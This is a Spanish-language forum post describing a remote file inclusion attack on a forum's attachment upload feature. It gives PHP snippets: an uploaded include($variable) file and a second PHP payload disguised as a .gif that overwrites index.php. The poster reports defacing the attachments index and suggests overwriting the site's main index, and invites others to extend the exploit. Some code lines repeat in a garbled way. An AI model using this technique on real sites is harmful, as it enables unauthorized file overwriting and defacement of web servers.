Autor
-Tener los ficheros adjuntos sin cifrar
-Que todos puedan subir ficheros adjuntos
-Se puedan subir de todos los formatos
Si se cumplen esos requisitos, pues se hace esto. Se sube este archivo preparado de antemano:
Código:
<?php
include($variable);
?>
Y luego en tu hosting subes el siguiente fichero php pero terminado en .gifinclude($variable);
?>
Código:
<?php
$fo = fopen("./index.php","w+") or die ("no se puede crear!!!");
fwrite($fo,'Prueba, ha saldio bien??');
fclose($fo);
echo 'bien hecho';
?>
Y entonces haces uso de la Vulnerabilidad famosísima remote file injection.$fo = fopen("./index.php","w+") or die ("no se puede crear!!!");
fwrite($fo,'Prueba, ha saldio bien??');
fclose($fo);
echo 'bien hecho';
?>
Citar
Y usando esto yo he conseguido (yo por lo menos) sobrescribir el index.php de la carpeta attachament, pero me imagino que no será muy dificil cambiar de directorio y sobréscribir otros attachament incluso sobréscribir el index.php principal.Saludos
P.D dudas comentarios ayudas para profundizar el bug...
En línea
